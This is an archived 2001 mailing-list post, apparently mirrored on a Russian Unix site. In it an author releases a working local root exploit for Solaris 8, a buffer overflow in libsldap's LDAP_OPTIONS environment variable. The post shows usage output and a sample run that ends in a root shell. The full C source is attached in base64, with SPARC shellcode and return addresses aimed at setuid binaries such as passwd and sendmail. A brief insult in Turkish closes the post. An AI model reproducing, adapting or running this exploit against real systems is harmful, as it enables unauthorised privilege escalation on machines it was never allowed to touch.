The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Solaris 8 libsldap exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 5 Jul 2001 14:14:09 +0300 (EEST)
From: Noir Desir <[email protected]>
To: [email protected]
Subject: Solaris 8 libsldap exploit

--8323328-469440322-994331649=:13135
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hi,

I wish to free this one since it has been made public by some
ppl. libsldap hole has been
known for long. As far as I know, [email protected] did actually found the
hole several months
ago and generously let me know about it. All propz goes to him. Thanks
bro.

Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
success.
I usually support the anti-sec movement but I got my reasons to publish
the exploit.
If you want to know why, please do mail me.

$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: [email protected]
Bug discovery: [email protected]

Usage: ./libsldap-exp target#

target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64
$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#


PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak. 
Haberin olsun istedim : ) 

 
Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos


cheers,
noir




--8323328-469440322-994331649=:13135
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="libsldap-exp.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: 
Content-Disposition: attachment; filename="libsldap-exp.c"

LyoqICEhIVBSSVZBVEUhISEgDQogKiogbm9pckBnc3UubGludXgub3JnLnRy
DQogKiogbGlic2xkYXAuc28uMSAkTERBUF9PUFRJT05TIGVudmlyb21lbnQg
dmFyaWFibGUgb3ZlcmZsb3cgZXhwbG9pdDsNCiAqKiANCiAqKi8NCiAgDQoj
aW5jbHVkZSA8c3RkaW8uaD4NCg0KI2RlZmluZSBBREpVU1QgICAgICAxDQoN
Cg0KLyogYW5hdGhlbWFAaGFjay5jby56YQ0KKiogU29sYXJpcy9TUEFSQyBz
aGVsbGNvZGUNCioqIHNldHJldWlkKDAsIDApOyBzZXRyZWdpZCgwLCAwKTsg
ZXhlY3ZlKCIvYmluL3NoIiwgYXJncywgMCk7DQoqLw0KDQpjaGFyIHNoZWxs
Y29kZVtdID0NCiJceDkwXHgxYVx4NDBceDA5XHg5Mlx4MWFceDQwXHgwOVx4
ODJceDEwXHgyMFx4Y2FceDkxXHhkMFx4MjBceDA4Ig0KIlx4OTBceDFhXHg0
MFx4MDlceDkyXHgxYVx4NDBceDA5XHg4Mlx4MTBceDIwXHhjYlx4OTFceGQw
XHgyMFx4MDgiDQoiXHgyZFx4MGJceGQ4XHg5YVx4YWNceDE1XHhhMVx4NmVc
eDJmXHgwYlx4ZGNceGRhXHg5MFx4MGJceDgwXHgwZSINCiJceDkyXHgwM1x4
YTBceDA4XHg5NFx4MWFceDgwXHgwYVx4OWNceDAzXHhhMFx4MTBceGVjXHgz
Ylx4YmZceGYwIg0KIlx4ZGNceDIzXHhiZlx4ZjhceGMwXHgyM1x4YmZceGZj
XHg4Mlx4MTBceDIwXHgzYlx4OTFceGQwXHgyMFx4MDgiOw0KDQpzdHJ1Y3Qg
dHlwZSB7DQpjaGFyICpzdHJpbmc7DQpjaGFyICpwYXRoOw0KbG9uZyByZXRh
ZGRyOw0KfTsNCg0Kc3RydWN0IHR5cGUgdGFyZ2V0W10gPSANCiAgICAgIHsN
Cgl7ICIwLCAvdXNyL2Jpbi9wYXNzd2QgU29sYXJpczgsIFNwYXJjNjQiLCAi
L3Vzci9iaW4vcGFzc3dkIiwgMHhmZmJlZmU5OCB9LA0KCXsgIjEsIC91c3Iv
YmluL25pc3Bhc3N3ZCBTb2xhcmlzOCwgU3BhcmM2NCIsICIvdXNyL2Jpbi9u
aXNwYXNzd2QiLCAweGZmYmVmZTk4IH0sDQoJeyAiMiwgL3Vzci9iaW4veXBw
YXNzd2QgU29sYXJpczgsIFNwYXJjNjQiLCAiL3Vzci9iaW4veXBwYXNzd2Qi
LCAweGZmYmVmZTk4IH0sDQoJeyAiMywgL3Vzci9iaW4vY2hrZXkgU29sYXJp
czgsIFNwYXJjNjQgIiwgIi91c3IvYmluL2Noa2V5IiwgMHhmZmJlZmVhOCB9
LA0KCXsgIjQsIC91c3IvbGliL3NlbmRtYWlsIFNvbGFyaXM4LCBTcGFyYzY0
IiwgIi91c3IvbGliL3NlbmRtYWlsIiwgMHhmZmJlZmViOCB9LA0KCXsgTlVM
TCwgTlVMTCwgMCB9IA0KICAgICAgfTsNCg0KaW50IGk7DQp1bnNpZ25lZCBs
b25nIHJldF9hZHI7DQpjaGFyIGxkYXBbNDAwMF07DQpjaGFyIGVnZ1s0MDBd
Ow0KY2hhciAqZW52c1tdID0geyBsZGFwLCBlZ2csIE5VTEwgfTsNCg0KbWFp
bihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KDQogICAgICBpZighYXJn
dlsxXSkNCiAgICAgIHsNCiAgICAgICAgICAgICAgZnByaW50ZihzdGRlcnIs
ICJsaWJzbGRhcC5zby4xICRMREFQX09QVElPTlMgZW52aXJvbWVudCB2YXJp
YWJsZSBcDQpidWZmZXIgb3ZlcmZsb3dcbkV4cGxvaXQgY29kZTogbm9pckBn
c3UubGludXgub3JnLnRyXG5CdWcgZGlzY292ZXJ5OiBzd2F5QGhhY2suY28u
emFcblxuVXNhZ2U6ICVzIHRhcmdldCNcblxuIiwgYXJndlswXSk7DQogICAg
ICBmb3IoaSA9IDA7IHRhcmdldFtpXS5zdHJpbmcgIT0gTlVMTDsgaSsrKQ0K
ICAgICAgZnByaW50ZihzdGRlcnIsInRhcmdldCM6ICVzXG4iLCB0YXJnZXRb
aV0uc3RyaW5nKTsNCiAgICAgIGV4aXQoMCk7IA0KICAgICAgfQ0KDQogIHJl
dF9hZHIgPSB0YXJnZXRbYXRvaShhcmd2WzFdKV0ucmV0YWRkcjsNCiANCiAg
bWVtc2V0KGVnZywgMHgwMCwgc2l6ZW9mIGVnZyk7DQogIGZvcihpID0gMCA7
IGkgPCA0MDAgLSBzdHJsZW4oc2hlbGxjb2RlKSA7IGkgKz00KQ0KICAqKGxv
bmcgKikmZWdnW2ldID0gIDB4YTYxY2MwMTM7IA0KICBmb3IgKGk9IDAgOyBp
IDwgc3RybGVuKHNoZWxsY29kZSk7IGkrKykgDQogICAgIGVnZ1syMDAraV09
c2hlbGxjb2RlW2ldOw0KICANCiBmb3IgKCBpID0gMDsgaSA8ICBBREpVU1Q7
IGkrKykgbGRhcFtpXT0weDU4Ow0KIGZvciAoaSA9IEFESlVTVDsgaSA8IDQw
MDA7IGkrPTQpDQogICAgew0KICAgICAgbGRhcFtpKzNdPXJldF9hZHIgJiAw
eGZmOw0KICAgICAgbGRhcFtpKzJdPShyZXRfYWRyID4+IDggKSAmMHhmZjsN
CiAgICAgIGxkYXBbaSsxXT0ocmV0X2FkciA+PiAxNiApICYweGZmOw0KICAg
ICAgbGRhcFtpKzBdPShyZXRfYWRyID4+IDI0ICkgJjB4ZmY7DQogICAgfQ0K
bWVtY3B5KGxkYXAsICJMREFQX09QVElPTlM9IiwgMTMpOw0KIA0KbGRhcFtz
dHJsZW4obGRhcCkgLSAzXSA9IDB4MDA7IC8vbGRhcFszOTk4XSBoYXMgdG8g
YmUgTlVMTCB0ZXJtaW5hdGVkDQoNCmV4ZWNsZSh0YXJnZXRbYXRvaShhcmd2
WzFdKV0ucGF0aCwgIjEyMzQxMjM0IiwgKGNoYXIgKikwLCBlbnZzKTsNCg0K
fQ0KDQoNCg==
--8323328-469440322-994331649=:13135--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру